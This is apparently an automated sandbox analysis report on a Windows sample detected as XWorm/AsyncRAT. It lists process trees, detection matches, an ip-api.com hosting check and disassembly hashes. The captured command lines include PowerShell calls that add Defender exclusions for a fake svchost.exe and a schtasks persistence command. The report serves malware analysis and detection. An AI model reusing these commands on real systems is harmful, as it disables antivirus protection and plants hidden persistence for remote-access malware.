                                                                  HTTP Request Dependency Graph

                                                                  • ip-api.com

                                                                  HTTP Packets

                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.1049702208.95.112.180512C:\Users\user\AppData\Roaming\svchost.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 2, 2025 20:10:50.265943050 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                  Host: ip-api.com
                                                                  Connection: Keep-Alive
                                                                  Jan 2, 2025 20:10:50.724276066 CET175INHTTP/1.1 200 OK
                                                                  Date: Thu, 02 Jan 2025 19:10:50 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Content-Length: 6
                                                                  Access-Control-Allow-Origin: *
                                                                  X-Ttl: 51
                                                                  X-Rl: 42
                                                                  Data Raw: 66 61 6c 73 65 0a
                                                                  Data Ascii: false


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:14:10:43
                                                                  Start date:02/01/2025
                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\Desktop\file.exe"
                                                                  Imagebase:0x680000
                                                                  File size:14'791'680 bytes
                                                                  MD5 hash:F33EECEDA472B6CC6B7880DBBA4F4D1F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.1563949127.0000000003881000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:2
                                                                  Start time:14:10:45
                                                                  Start date:02/01/2025
                                                                  Path:C:\Users\user\AppData\Roaming\All function.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Roaming\All function.exe"
                                                                  Imagebase:0x890000
                                                                  File size:14'709'248 bytes
                                                                  MD5 hash:A23632476984A0D607DBF76B1096432F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000002.00000002.1573877991.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000002.00000002.1573877991.00000000038C1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 83%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:3
                                                                  Start time:14:10:45
                                                                  Start date:02/01/2025
                                                                  Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                  Imagebase:0x950000
                                                                  File size:69'632 bytes
                                                                  MD5 hash:6D378D7AF71086710318CDDA873D9348
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2787361809.0000000002D6C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000000.1561790359.0000000000952000.00000002.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000000.1561790359.0000000000952000.00000002.00000001.01000000.00000007.sdmp, Author: ditekSHen
                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.2787361809.0000000002D21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Joe Security
                                                                  • Rule: rat_win_xworm_v3, Description: Finds XWorm (version XClient, v3) samples based on characteristic strings, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: Sekoia.io
                                                                  • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\svchost.exe, Author: ditekSHen
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 92%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:4
                                                                  Start time:14:10:46
                                                                  Start date:02/01/2025
                                                                  Path:C:\Users\user\AppData\Roaming\ALL slumzick.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Roaming\ALL slumzick.exe"
                                                                  Imagebase:0x7ff6ba530000
                                                                  File size:14'620'672 bytes
                                                                  MD5 hash:735BD603CC2800BDB3972CC2B561E86A
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 47%, ReversingLabs
                                                                  Reputation:low
                                                                  Has exited:false

                                                                  General

                                                                  Target ID:5
                                                                  Start time:14:10:46
                                                                  Start date:02/01/2025
                                                                  Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Users\user\AppData\Roaming\svchost.exe"
                                                                  Imagebase:0x110000
                                                                  File size:69'632 bytes
                                                                  MD5 hash:6D378D7AF71086710318CDDA873D9348
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:low
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:6
                                                                  Start time:14:10:49
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                                                                  Imagebase:0x7ff7b2bb0000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:7
                                                                  Start time:14:10:49
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff620390000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:9
                                                                  Start time:14:10:57
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                                  Imagebase:0x7ff7b2bb0000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:10
                                                                  Start time:14:10:57
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff620390000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:14
                                                                  Start time:14:11:10
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\svchost.exe'
                                                                  Imagebase:0x7ff7b2bb0000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:15
                                                                  Start time:14:11:10
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff620390000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:18
                                                                  Start time:14:11:28
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
                                                                  Imagebase:0x7ff7b2bb0000
                                                                  File size:452'608 bytes
                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:19
                                                                  Start time:14:11:28
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff620390000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:20
                                                                  Start time:14:11:51
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\user\AppData\Roaming\svchost.exe"
                                                                  Imagebase:0x7ff6fcf00000
                                                                  File size:235'008 bytes
                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:21
                                                                  Start time:14:11:51
                                                                  Start date:02/01/2025
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff620390000
                                                                  File size:862'208 bytes
                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:22
                                                                  Start time:14:11:52
                                                                  Start date:02/01/2025
                                                                  Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  Imagebase:0x3a0000
                                                                  File size:69'632 bytes
                                                                  MD5 hash:6D378D7AF71086710318CDDA873D9348
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  General

                                                                  Target ID:23
                                                                  Start time:14:12:01
                                                                  Start date:02/01/2025
                                                                  Path:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  Imagebase:0x390000
                                                                  File size:69'632 bytes
                                                                  MD5 hash:6D378D7AF71086710318CDDA873D9348
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Has exited:true

                                                                  Disassembly

                                                                  Reset < >

                                                                    Executed Functions

                                                                    Function 00007FF7C0CC0D80 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1565086993.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff7c0cc0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: H
                                                                    • API String ID: 0-2852464175
                                                                    • Opcode ID: 0cd1a8d9f20a846ffcdbc3325244570115770bf60af928a2450248e64a8b56f4
                                                                    • Instruction ID: fbc3c0aedaae9737f50f3df3a51f0730221c21ac4bd18cfa028ea9ae1ec383c1
                                                                    • Opcode Fuzzy Hash: 0cd1a8d9f20a846ffcdbc3325244570115770bf60af928a2450248e64a8b56f4
                                                                    • Instruction Fuzzy Hash: A631566288E3C25FC3036B749C664E57FB09E57220B4E40DBD8C5CB5A3D61C6A9AC762
                                                                    Function 00007FF7C0CC10ED Relevance: .4, Instructions: 427COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1565086993.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff7c0cc0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 859c075f45b55f402148a25dcf26303a86a1aec6a76639d86d62767069116843
                                                                    • Instruction ID: e1a946fbbb23744d4adea16b3a34cf8b85acb213fdee46a9ae7a949feeeca763
                                                                    • Opcode Fuzzy Hash: 859c075f45b55f402148a25dcf26303a86a1aec6a76639d86d62767069116843
                                                                    • Instruction Fuzzy Hash: E631E531B0CA8C4FD785EB6C88596BCBBE1FF5A215B4801BBD40DC32A3DE24A845C751
                                                                    Function 00007FF7C0CC09F7 Relevance: .2, Instructions: 204COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1565086993.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff7c0cc0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: adefd78d1d0fcc0c421da7bea7029cd6e5ff8def9a3f915fe6eb6fe3861f5f2a
                                                                    • Instruction ID: b39c46e10a6f003774434504c421338903153d6a56c9d204d5965f41f4f3a3e6
                                                                    • Opcode Fuzzy Hash: adefd78d1d0fcc0c421da7bea7029cd6e5ff8def9a3f915fe6eb6fe3861f5f2a
                                                                    • Instruction Fuzzy Hash: 44713170A189098FDB99EF28C458BADB7E2FF54325F644268E01AD32D5CF38AC41CB50
                                                                    Function 00007FF7C0CC0498 Relevance: .1, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1565086993.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff7c0cc0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 847ba16284147bb30c8679f0fe8c221dd12f433c8a5f492a87646a3d629bdeb5
                                                                    • Instruction ID: 660ac321214e9c2022435d8324ad8acb406a20f92a77ccec7a802822f506da18
                                                                    • Opcode Fuzzy Hash: 847ba16284147bb30c8679f0fe8c221dd12f433c8a5f492a87646a3d629bdeb5
                                                                    • Instruction Fuzzy Hash: 97219030B14D4D8FDB94FB6C88996BDB3E2FF98355B44017AE40EC32A2DE64A8418750
                                                                    Function 00007FF7C0CC0951 Relevance: .1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1565086993.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff7c0cc0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0184f4bcb4068439a9ff437e1f8016535e8e4c908e5cd8942d905d34bf3193d5
                                                                    • Instruction ID: 720e2e85804b28e17ad063b1767c8c0050357ed425da53eed5fbbc60967bd313
                                                                    • Opcode Fuzzy Hash: 0184f4bcb4068439a9ff437e1f8016535e8e4c908e5cd8942d905d34bf3193d5
                                                                    • Instruction Fuzzy Hash: D711CE71C04A488FEB44EFA8C4493EEBBF0EF58324F50416AD404E3382DB78A9468B91
                                                                    Function 00007FF7C0CC0E71 Relevance: .1, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1565086993.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff7c0cc0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8eb760818832e1b5c36f01d6f0de4603618c3a9d847c95cb7ae885bcdbda4be9
                                                                    • Instruction ID: 0b608216bce05482c8fb6697329ea7b6486d369cb17435bad74ad7cfc9d03003
                                                                    • Opcode Fuzzy Hash: 8eb760818832e1b5c36f01d6f0de4603618c3a9d847c95cb7ae885bcdbda4be9
                                                                    • Instruction Fuzzy Hash: A9014930A1DA494FC365FB2CD8516A973D1EF89320F5006BAD549C3382EA2CB84287C1
                                                                    Function 00007FF7C0CC04B0 Relevance: .0, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1565086993.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff7c0cc0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0c4702920fd6670da4af8f575ea36be13084f813a3e439a6734bf31557cfeae2
                                                                    • Instruction ID: caf63d74f2d55f4253d329785645a2d5ec0fa41805317367bed30ce33dbabc99
                                                                    • Opcode Fuzzy Hash: 0c4702920fd6670da4af8f575ea36be13084f813a3e439a6734bf31557cfeae2
                                                                    • Instruction Fuzzy Hash: 7AF08130618D194BD764FA2CD4556A9B3D1EF88324BA00579D54EC3381DE28B84247C1
                                                                    Function 00007FF7C0CC04A8 Relevance: .0, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1565086993.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff7c0cc0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 82eee831777e28f4580a7c65714eb7d510bc1c8ad7896352cd9548ae47bff765
                                                                    • Instruction ID: 07080d91c6acb6a94958200856ffdfd5d2fa0c7cec9468cfe25e7769be00b4c2
                                                                    • Opcode Fuzzy Hash: 82eee831777e28f4580a7c65714eb7d510bc1c8ad7896352cd9548ae47bff765
                                                                    • Instruction Fuzzy Hash: 93F0C830A1DD5A4BD764FA3CD8416B9B3D5EF88364B600A79D54EC3382DE2CB84147C1
                                                                    Function 00007FF7C0CC0F3F Relevance: .0, Instructions: 30COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1565086993.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff7c0cc0000_file.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b24ca124b1083a418f45a3b8bb55cca60c07e55bc3bd5c88cd0c45cf43f264b6
                                                                    • Instruction ID: 101a87747f173bdaf264f42b745eb0865e1926710bfcc7d58640c503de9805e5
                                                                    • Opcode Fuzzy Hash: b24ca124b1083a418f45a3b8bb55cca60c07e55bc3bd5c88cd0c45cf43f264b6
                                                                    • Instruction Fuzzy Hash: 85E08611F18D0A4BE7A876AC68652F8A3C2DF88260F905179E10DC27C3DD19AC824251

                                                                    Executed Functions

                                                                    Function 00007FF7C0CC0D80 Relevance: 1.4, Strings: 1, Instructions: 110COMMON
                                                                    Download Yara Rule
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1574594709.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff7c0cc0000_All function.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: H
                                                                    • API String ID: 0-2852464175
                                                                    • Opcode ID: 9e8cc8fe7e25b2f6f6d322561949550146954083a1db67d7208af0d0a4b6ea06
                                                                    • Instruction ID: dfbaddf3c089fe58b5642e06e48c4b430a64930638fb8b07416f80b29e8025d6
                                                                    • Opcode Fuzzy Hash: 9e8cc8fe7e25b2f6f6d322561949550146954083a1db67d7208af0d0a4b6ea06
                                                                    • Instruction Fuzzy Hash: 1631566288E3C25FC7036B709C664E57FB09E47220B4E40DBD8C5CB5A3D61C6A9AC762
                                                                    Function 00007FF7C0CC09F7 Relevance: .2, Instructions: 204COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1574594709.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff7c0cc0000_All function.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c11fce28c6eee5403bab39e18fbcd39df737d0fa411ede4fe19bd4721e40f02a
                                                                    • Instruction ID: b3f2e4e31c4f7c511183f6771731fb413a571614f670652fe0f48f7a9d46bedc
                                                                    • Opcode Fuzzy Hash: c11fce28c6eee5403bab39e18fbcd39df737d0fa411ede4fe19bd4721e40f02a
                                                                    • Instruction Fuzzy Hash: 87713270A189098FDB98EF28C458BADB7E2FF54325F644268D01AD32D5CF38AC41CB50
                                                                    Function 00007FF7C0CC0498 Relevance: .1, Instructions: 90COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1574594709.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff7c0cc0000_All function.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ff504e1c915f31e59188e27f42d0d11187117cdb4482daa5b93bf3e8397ae95a
                                                                    • Instruction ID: aee214e5a8c6c686a13a3fe70a1583f02b26b1312db9b04fa80497308bd38559
                                                                    • Opcode Fuzzy Hash: ff504e1c915f31e59188e27f42d0d11187117cdb4482daa5b93bf3e8397ae95a
                                                                    • Instruction Fuzzy Hash: 03219030B14D4D8FDB94FB6D88996BDB3E2FF98355B44017AE40EC32A2DE64A8418750
                                                                    Function 00007FF7C0CC0951 Relevance: .1, Instructions: 57COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1574594709.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff7c0cc0000_All function.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b3b5709384bf0daa152494fdf621cfe1dd9f1581747fd1074917f5cd655dc4a0
                                                                    • Instruction ID: aa3c748f4cd2142a5faa15838b951c9ebb769967a6ad32dcd2dc2850b8b08ac8
                                                                    • Opcode Fuzzy Hash: b3b5709384bf0daa152494fdf621cfe1dd9f1581747fd1074917f5cd655dc4a0
                                                                    • Instruction Fuzzy Hash: EA11CE71C04A488FEB44EFA8C4493EEBBF0EF58324F50416AD404E3382DF78A9468B91
                                                                    Function 00007FF7C0CC0E71 Relevance: .1, Instructions: 54COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1574594709.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff7c0cc0000_All function.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 72f35ffd396e52354c5b326f4cdb16e2799717d43f8e8a0ea141f4b2f498a90b
                                                                    • Instruction ID: 45e46b18ac03159e859ba14052dc334b576c06367762f1dc4fd6a7f0deafec96
                                                                    • Opcode Fuzzy Hash: 72f35ffd396e52354c5b326f4cdb16e2799717d43f8e8a0ea141f4b2f498a90b
                                                                    • Instruction Fuzzy Hash: 7A01F930A1DA594FD764FB28D855AA973D1EF89324F50067AD549C3382EA2CB84297C1
                                                                    Function 00007FF7C0CC04B0 Relevance: .0, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1574594709.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff7c0cc0000_All function.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ecaaebf632ec8060ffaea899d60a785e8bfb7441bf9e4ba8cbe6ab6b4a54263f
                                                                    • Instruction ID: 011cb82b41d14e4454faa1df7b3851f1637c81085df35cc725cd2529ea262800
                                                                    • Opcode Fuzzy Hash: ecaaebf632ec8060ffaea899d60a785e8bfb7441bf9e4ba8cbe6ab6b4a54263f
                                                                    • Instruction Fuzzy Hash: DCF0A430718D194BD764FB2894556BDB3D1EF88324BA00539D54EC3381DF2CB84247C1
                                                                    Function 00007FF7C0CC04A8 Relevance: .0, Instructions: 45COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1574594709.00007FF7C0CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0CC0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff7c0cc0000_All function.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 8e63ce30479f781c914f26fc7ab67797f3e394af0950acc57d58113ae40c859d
                                                                    • Instruction ID: 248c1d526a3ea120755c5fa951f75788470c3759d6c29dc6aa70a31a5b3f103c
                                                                    • Opcode Fuzzy Hash: 8e63ce30479f781c914f26fc7ab67797f3e394af0950acc57d58113ae40c859d
